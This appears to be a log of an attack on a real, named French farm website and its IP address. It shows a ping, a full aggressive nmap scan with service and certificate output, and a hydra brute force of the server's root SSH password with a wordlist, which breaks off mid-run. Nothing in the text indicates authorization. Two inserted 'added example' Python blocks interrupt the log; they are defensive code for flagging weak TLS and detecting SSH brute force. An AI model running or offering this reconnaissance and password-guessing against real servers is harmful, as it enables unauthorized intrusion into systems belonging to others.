For the site fermeduchapiron.fr
I notice that it does not have an SSL certificate, so I decide to ping it in order to retrieve its IP:
darto@invictus:[~]: ping fermeduchapiron.fr
PING fermeduchapiron.fr (188.165.224.172) 56(84) bytes of data.
64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=1 ttl=128 time=30.7 ms
64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=2 ttl=128 time=88.2 ms
64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=3 ttl=128 time=185 ms
^C
--- fermeduchapiron.fr ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 30.762/101.353/185.052/63.667 ms
Next I run an nmap scan to see which ports and services are exposed:
darto@invictus:[~]: sudo nmap -A -v sV -O 188.165.224.172
Starting Nmap 6.47 ( http://nmap.org ) at 2018-09-25 11:45 CEST
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Failed to resolve "sV".
Initiating Ping Scan at 11:45
Scanning 188.165.224.172 [4 ports]
Completed Ping Scan at 11:45, 1.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:45
Completed Parallel DNS resolution of 1 host. at 11:45, 0.24s elapsed
Initiating SYN Stealth Scan at 11:45
Scanning ns212328.ip-188-165-224.eu (188.165.224.172) [1000 ports]
Discovered open port 110/tcp on 188.165.224.172
Discovered open port 995/tcp on 188.165.224.172
Discovered open port 25/tcp on 188.165.224.172
Discovered open port 22/tcp on 188.165.224.172
Discovered open port 53/tcp on 188.165.224.172
Discovered open port 993/tcp on 188.165.224.172
Discovered open port 21/tcp on 188.165.224.172
Discovered open port 143/tcp on 188.165.224.172
Discovered open port 587/tcp on 188.165.224.172
Discovered open port 443/tcp on 188.165.224.172
Discovered open port 80/tcp on 188.165.224.172
SYN Stealth Scan Timing: About 26.72% done; ETC: 11:47 (0:01:25 remaining)
Discovered open port 106/tcp on 188.165.224.172
Discovered open port 465/tcp on 188.165.224.172
SYN Stealth Scan Timing: About 56.27% done; ETC: 11:47 (0:01:10 remaining)
Discovered open port 8443/tcp on 188.165.224.172
SYN Stealth Scan Timing: About 70.38% done; ETC: 11:48 (0:00:54 remaining)
SYN Stealth Scan Timing: About 81.45% done; ETC: 11:48 (0:00:36 remaining)
Completed SYN Stealth Scan at 11:48, 204.19s elapsed (1000 total ports)
Initiating Service scan at 11:48
Scanning 14 services on ns212328.ip-188-165-224.eu (188.165.224.172)
Completed Service scan at 11:48, 19.66s elapsed (14 services on 1 host)
Initiating OS detection (try #1) against ns212328.ip-188-165-224.eu (188.165.224.172)
Retrying OS detection (try #2) against ns212328.ip-188-165-224.eu (188.165.224.172)
Initiating Traceroute at 11:49
Completed Traceroute at 11:49, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:49
Completed Parallel DNS resolution of 2 hosts. at 11:49, 0.06s elapsed
NSE: Script scanning 188.165.224.172.
Initiating NSE at 11:49
Completed NSE at 11:51, 150.69s elapsed
Nmap scan report for ns212328.ip-188-165-224.eu (188.165.224.172)
Host is up (0.044s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.4c
| ssl-cert: Subject: commonName=sciweb.fr
| Issuer: commonName=WoSign CA Free SSL Certificate G2/organizationName=WoSign CA Limited/countryName=CN
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2016-02-24T20:12:37+00:00
| Not valid after: 2019-02-24T20:12:37+00:00
| MD5: 3917 cdbb 33fc 0c05 68a9 e959 465c 6afd
|_SHA-1: e343 5003 0f28 d773 f9c1 e96b 3deb aa8d fcf9 40ab
|_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 bf:8f:de:e6:cb:61:b3:3f:92:6d:25:49:05:10:e2:b7 (DSA)
|_ 2048 73:6e:1b:44:49:ca:62:6f:8c:f6:d1:6a:36:17:12:17 (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, STARTTLS, AUTH DIGEST-MD5 LOGIN PLAIN CRAM-MD5, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after: 2016-01-22T19:02:55+00:00
| MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
|_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
53/tcp open domain ISC BIND none
| dns-nsid:
|_ bind.version: none
80/tcp open http nginx
|_http-favicon: Parallels Control Panel
|_http-methods: GET HEAD POST OPTIONS
|_http-title: Default Parallels Plesk Panel Page
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: PIPELINING SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 PLAIN) TOP STLS USER LOGIN-DELAY(10) IMPLEMENTATION(Courier Mail Server) APOP UIDL
143/tcp open imap Courier Imapd (released 2011)
|_imap-capabilities: IDLE THREAD=ORDEREDSUBJECT AUTH=PLAIN ACL2=UNION CAPABILITY IMAP4rev1 SORT AUTH=CRAM-MD5 UIDPLUS NAMESPACE completed ACL AUTH=CRAM-SHA256 AUTH=CRAM-SHA1 OK CHILDREN THREAD=REFERENCES QUOTA STARTTLSA0001
443/tcp open http nginx
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
| Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2014-01-22T19:05:41+00:00
| Not valid after: 2015-01-22T19:05:41+00:00
| MD5: fe25 5bcf 00a6 3558 8231 1aed 2145 b67b
|_SHA-1: bcb0 1091 a602 c3f3 1661 a989 b6e3 1a4a 2040 3d71
|_ssl-date: 2018-09-25T09:49:23+00:00; +7s from local time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
445/tcp filtered microsoft-ds
465/tcp open ssl/smtp Postfix smtpd
|_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, AUTH DIGEST-MD5 LOGIN PLAIN CRAM-MD5, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after: 2016-01-22T19:02:55+00:00
| MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
514/tcp filtered shell
587/tcp open smtp Postfix smtpd
|_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after: 2016-01-22T19:02:55+00:00
| MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
|_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
993/tcp open ssl/imap Courier Imapd (released 2011)
|_imap-capabilities: IDLE THREAD=ORDEREDSUBJECT AUTH=PLAIN CAPABILITY IMAP4rev1 SORT AUTH=CRAM-MD5 ACL2=UNIONA0001 NAMESPACE completed ACL AUTH=CRAM-SHA256 AUTH=CRAM-SHA1 UIDPLUS OK THREAD=REFERENCES QUOTA CHILDREN
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after: 2016-01-22T19:02:55+00:00
| MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
| sslv2:
| SSLv2 supported
| ciphers:
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: APOP IMPLEMENTATION(Courier Mail Server) USER SASL(LOGIN PLAIN) TOP UIDL PIPELINING LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after: 2016-01-22T19:02:55+00:00
| MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
| sslv2:
| SSLv2 supported
| ciphers:
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
8443/tcp open http nginx
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=sciweb.fr
| Issuer: commonName=WoSign CA Free SSL Certificate G2/organizationName=WoSign CA Limited/countryName=CN
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2016-02-24T20:12:37+00:00
| Not valid after: 2019-02-24T20:12:37+00:00
| MD5: 3917 cdbb 33fc 0c05 68a9 e959 465c 6afd
|_SHA-1: e343 5003 0f28 d773 f9c1 e96b 3deb aa8d fcf9 40ab
|_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
Device type: general purpose|storage-misc|VoIP phone
Running (JUST GUESSING): Linux 2.4.X|3.X (98%), Microsoft Windows 7|XP (96%), BlueArc embedded (91%), Pirelli embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/o:microsoft:windows_7:::enterprise cpe:/o:microsoft:windows_xp::sp3 cpe:/h:bluearc:titan_2100 cpe:/h:pirelli:dp-10
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Microsoft Windows 7 Enterprise (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%), Pirelli DP-10 VoIP phone (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Hosts: sciweb.fr, localhost.localdomain; OS: Unix
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.12 ms 192.168.23.2
2 0.10 ms ns212328.ip-188-165-224.eu (188.165.224.172)
NSE: Script Post-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 403.58 seconds
Raw packets sent: 1275 (59.332KB) | Rcvd: 1244 (50.404KB)
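An added example, not part of the original paste, showing how a defender would triage the scan output above rather than just read it: it parses the ssl-cert and sslv2 script lines from nmap's normal output (a trimmed excerpt of the scan above, re-typed here as constructed sample input) and flags certificates already expired on the scan date, RSA keys shorter than 2048 bits, and SSLv2 support. The 2018-09-25 cutoff is the date printed in the Nmap banner; the thresholds are this example's own choices.

```python
import re
from datetime import datetime, timezone
# Excerpt of the nmap output shown above (constructed subset, same line format).
SCAN_EXCERPT = """\
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH
| Public Key bits: 1024
| Not valid after: 2016-01-22T19:02:55+00:00
443/tcp open http nginx
| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels
| Public Key bits: 2048
| Not valid after: 2015-01-22T19:05:41+00:00
| sslv2:
| SSLv2 supported
8443/tcp open http nginx
| ssl-cert: Subject: commonName=sciweb.fr
| Public Key bits: 2048
| Not valid after: 2019-02-24T20:12:37+00:00
"""
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+")
SCAN_DATE = datetime(2018, 9, 25, tzinfo=timezone.utc)  # date in the Nmap banner above

def parse_services(text):
    """Group the '|' script lines of nmap normal output under their port number."""
    services, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            services[current] = {"sslv2": False, "bits": None, "not_after": None}
        elif current is not None and line.startswith("|"):
            body = line.lstrip("|_ ")  # drop the script-output gutter
            if body.startswith("Public Key bits:"):
                services[current]["bits"] = int(body.split(":")[1])
            elif body.startswith("Not valid after:"):
                services[current]["not_after"] = datetime.fromisoformat(body.split(": ", 1)[1])
            elif body == "SSLv2 supported":
                services[current]["sslv2"] = True
    return services

def tls_findings(text, now=SCAN_DATE):
    """Flag expired certificates, short RSA keys and SSLv2 support per open port."""
    findings = []
    for port, s in sorted(parse_services(text).items()):
        if s["not_after"] is not None and s["not_after"] < now:
            findings.append((port, "expired certificate"))
        if s["bits"] is not None and s["bits"] < 2048:
            findings.append((port, "RSA key shorter than 2048 bits"))
        if s["sslv2"]:
            findings.append((port, "SSLv2 enabled"))
    return findings
```

Run against the full scan above, the same logic also catches the expired 1024-bit OVH certificate reused on 465, 587, 993 and 995, and the SSLv2 offered on 993 and 995.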
I notice that port 22 is open, so it is possible to connect over SSH. Logging in directly as root is possible, so I launch a brute force to find a password:
darto@invictus:[~]: hydra -l root -P passwd.txt -t 10 -w 2 -s 22 -f 188.165.224.172 ssh
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
[WARNING] the waittime you set is low, this can result in errornous results
Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-25 11:34:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 10 tasks per 1 server, overall 10 tasks, 100083 login tries (l:1/p:100083), ~1000 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 99983 todo in 16:40h, 10 active
[STATUS] 73.33 tries/min, 220 tries in 00:03h, 99863 todo in 22:42h, 10 active
[STATUS] 65.71 tries/min, 460 tries in 00:07h, 99623 todo in 25:17h, 10 active
[STATUS] 62.67 tries/min, 940 tries in 00:15h, 99143 todo in 26:23h, 10 active
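An added example, not part of the original paste, showing what the session above looks like from the target's side: a password-guessing run against the root account at tens of tries per minute from a single source. The code parses sshd "Failed password" lines from a constructed auth.log excerpt (RFC 5737 documentation addresses, year assumed from the session date) and raises one alert per (source, account) pair once failures exceed a sliding-window threshold; the threshold and window are this example's own choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Constructed sshd auth.log excerpt; source addresses are RFC 5737 documentation ranges.
AUTH_LOG = """\
Sep 25 11:34:19 invictus sshd[4101]: Failed password for root from 203.0.113.7 port 50110 ssh2
Sep 25 11:34:19 invictus sshd[4102]: Failed password for root from 203.0.113.7 port 50111 ssh2
Sep 25 11:34:20 invictus sshd[4103]: Failed password for root from 203.0.113.7 port 50112 ssh2
Sep 25 11:34:20 invictus sshd[4104]: Failed password for root from 203.0.113.7 port 50113 ssh2
Sep 25 11:34:21 invictus sshd[4105]: Failed password for root from 203.0.113.7 port 50114 ssh2
Sep 25 11:34:21 invictus sshd[4106]: Accepted publickey for deploy from 198.51.100.9 port 41000 ssh2
Sep 25 11:34:22 invictus sshd[4107]: Failed password for root from 203.0.113.7 port 50115 ssh2
Sep 25 11:40:05 invictus sshd[4150]: Failed password for alice from 198.51.100.9 port 41002 ssh2
"""
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
LOG_YEAR = 2018  # syslog timestamps carry no year; assumed from the session above

def failed_logins(log):
    """Yield (timestamp, user, source_ip) for every sshd password failure."""
    for line in log.splitlines():
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(f"{LOG_YEAR} {m.group('ts')}", "%Y %b %d %H:%M:%S")
            yield ts, m.group("user"), m.group("ip")

def brute_force_sources(log, threshold=5, window_s=60):
    """Return {(ip, user): first_alert_time} for sources that reach `threshold`
    password failures against one account inside a sliding window of window_s seconds."""
    recent = defaultdict(deque)  # (ip, user) -> failure timestamps inside the window
    alerts = {}
    for ts, user, ip in failed_logins(log):
        q = recent[(ip, user)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:  # expire entries older than the window
            q.popleft()
        if len(q) >= threshold and (ip, user) not in alerts:
            alerts[(ip, user)] = ts
    return alerts
```

Key-only logins and the isolated failure from the second address stay below the threshold, so only the root-guessing source is reported.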
Kisses